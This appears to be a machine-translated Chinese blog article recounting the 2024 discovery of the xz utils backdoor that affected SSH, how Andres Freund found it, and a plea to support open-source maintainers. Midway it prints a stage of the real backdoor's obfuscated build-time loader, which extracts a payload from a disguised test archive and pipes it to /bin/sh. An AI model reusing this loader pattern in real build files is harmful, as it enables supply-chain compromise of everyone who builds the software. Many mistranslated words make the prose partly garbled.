SSH 中触发的毛病可以允许黑客接管服务器。安全专家感到恐慌。这次攻击大概持续了两年多,必要大量的资源和技术技能。
在已往的几个月里,每个人都在谈论 SSH 中触发的毛病。通常对它的形貌相当复杂。这只是某个随机应用程序中的另一个毛病吗?如果是这样,为什么网络安全专家如此关注这一毛病,而在线论坛上充斥着恐慌的安全专家?让我们一探究竟!
正如我们在 wiz.io 上读到的,在 xz utils 的 5.6.0 和 5.6.1 版本中发现了一个后门,影响了 SSH。据我们相识,xz 是一个下令行压缩工具,由 lzma 和 xz 构成,并影响了 SSH。
2024年3月29日星期五,Andres Freund向Openwall邮件列表发送了一封电子邮件。邮件列表对于精通技术的人来说就像Discord一样,而Openwall是一个掩护开源代码的项目。
正是在那里,Andres 分享了他令人不安的发现。
服务器接管
他当时正在利用安全Shell协议(SSH)进行一些工作。对于几乎每一个必要毗连到服务器的人来说,SSH就像意大利面的叉子一样。开发人员、DevOps、SecOps以及技术范畴的每个人都在利用SSH安全地毗连到服务器。纵然服务器也利用SSH毗连到其他服务器。
所以Andres当时正在做正常的技术工作,但有些事变不对劲,不仅仅是2024年橄榄油的代价。当他利用SSH登录到一台服务器时,服务器开始准备腾飞。
风扇转动得越来越快,通常安静的服务器开始发出吸气和打嗝的声音。在这种时候,人们会检查他们是否忘记关闭Windows时钟应用程序,谁人耗费CPU资源的野兽。
但是Andres利用的是Debian。所以他可以大概立刻排除这种大概性。此外,他注意到了更多的问题。Valgrind开始陈诉内存出现了一些问题。
这大概是什么缘故原由呢?Windows Explorer突然开始挖掘比特币了吗?不大概是这样的!
通凡人们会责怪服务器,然后忘记整个问题,但有些事变困扰着Andres,他决定进行调查。
在深入研究之后,他注意到实际上是ssh导致了全部这些症状。这很奇怪,由于ssh不表现广告,你也不能在上面玩《古墓丽影:决定版》。
那么这个几乎不消耗卡路里的应用程序到底是怎样让服务器如此剧烈运转的呢?
兔子洞深处
兔子洞深处 Andres决定再深入一点。他启动了诊断工具,越来越接近找出问题的具体缘故原由。肯定是ssh,但ssh中的哪个具体部分呢?他注意到是xz。
深入下去,发现xz的一个特定部分导致了CPU和内存的狂欢派对——liblzma。
总结一下。Liblzma是xz下令行工具利用的压缩库。SSH利用了该下令行工具。这是计算机程序中正常的依赖链,在这种情况下,正是SSH的深层依赖liblzma导致了问题。
感谢开源,Andres可以大概上网查看究竟发生了什么。他可以大概看到Debian的xz utils的源代码。
Andres发现了大量关于恶意代码怎样工作的信息。有两个测试文件实际上是存档文件。一个复杂的操纵系统导致这些存档文件在构建过程中被提取出来,并以包罗后门的方式修改SSH构建,让黑客可以登录到服务器。
风趣的是,Andres发现这个后门还在开发中。随着xz的后续版本发布,后门的作者试图隐藏后门的存在,并实际修复了导致Valgrind错误列表像圣诞树一样闪烁的内存问题。
荣幸的是,这个后门的作者相当低级,这让Andres意识到有些不对劲。再过几天或几周,就没人会注意到有什么问题了。
- The source code of the backdoor:
- ####Hello####
- #��Z�.hj�
- eval `grep ^srcdir= config.status`
- if test -f ../../config.status;then
- eval `grep ^srcdir= ../../config.status`
- srcdir="../../$srcdir"
- fi
- export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
- ####World####
后门的影响
安全专家对这一发现感到震惊,每一天都带来更多可怕的细节。通常当你有一台服务器,并想要修复一个安全毛病时,你可以利用SSH登录并更新软件。
但在这种情况下,SSH本身就存在一个后门。在这种情况下该怎么办?
Wiz.io建议立刻停止利用、升级受影响的服务器大概降级到不存在黑客可乘之机的版本。美国国家标准与技术研究院(NIST)对这个毛病给予了10分的最高评级(满分10分)。美国国家标准与技术研究院很少会对毛病给予如此高的评级。
上一次发生这种情况是在 2024 年 2 月 21 日,针对 CVE-2024-1709:“ConnectWise ScreenConnect 23.9.7 及之前版本受身份验证绕过毛病的影响,该毛病大概允许攻击者直接访问机密信息或关键系统。”
说 SecOps 现在正面对逆境还算轻描淡写。现实情况是非常糟糕的。纵然现在没有关于针对已经设置的后门的任何主动攻击信息,形势依然严峻。
此外,代码库中谁人令人不安的“Hello World”打趣似乎暗示这只是类似攻击的开始,实际上要将后门摆设到现在这种程度,已经涉及到相当复杂的操纵和技术知识。
这是支持核心维护者的信号
关于这次攻击的全部细节都必要被发现,将来也将成为许多学术论文的主题。但得益于 Rob Mensching 的努力,我们已经能相识到许多内容。
一些专家认为这并非一次快速攻击,而是一个经过经心策划的筹划。两年前,一些人开始持续向 xz 项目标维护者施压,要求将维护权交给可以大概继续项目标新人员。公开的沟通信息表明,还存在一些隐晦的实质压力。
最终,新维护者接手项目并开展工作,一切都很顺遂,直到厥后被感染的档案被加入项目。
我不确定那些向原 xz 维护者施压的人是否参与此中。也许是,也许不是。不管怎样,新维护者就是这样上任的。同样,我也不能确定贾谭是否真的就是举措背后的关键人物,由于他/她的系统也大概已经被入侵。这里存在很多不确定因素。
由于维护者的系统也大概被攻陷,这方面存在很多不确定性。
这里夸大的一个重要问题是核心库的维护者有多脆弱。我们全部人都依赖这些库,但他们通常无法从这项工作中得到收入,大概处于失业状态,大概身陷危机,或面对逆境。
这些维护者没有得到他们所需的全部资源,这是无法接受的。我们必要一种解决方案,让整个社区(包罗企业)全面地物质上支持这些人,并提供他们必要的建议,使他们可以大概专注于自己的项目而不陷入任何陷阱。在这个案例中,如果原维护者能继续项目工作,他本可以立刻阻止毛病的产生!
开源万岁
得益于全部相关部分的开源性子,我们得以深入相识这次后门攻击。如果无法查看源代码,安德烈斯就无法如此迅速地向世界发出警报。对于封闭系统来说,从创建毛病陈诉到公司复现、调查和修复大概必要数周甚至数月,导致后门在旷野持续更长时间。
由于我们知道黑客引入后门的每一步操纵,开源开发者和调查人员将可以大概封堵这一路上开启的每一扇门。这意味着纵然如此复杂的攻击大概发生,潜在的攻击面也会被封锁。
在这场战斗中,开源就像一个自愈的生物,在每次病毒侵袭后变得愈加强大。当然,我们仍必要继续改进。
最后:
vue2与vue3本领合集
VueUse源码解读
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
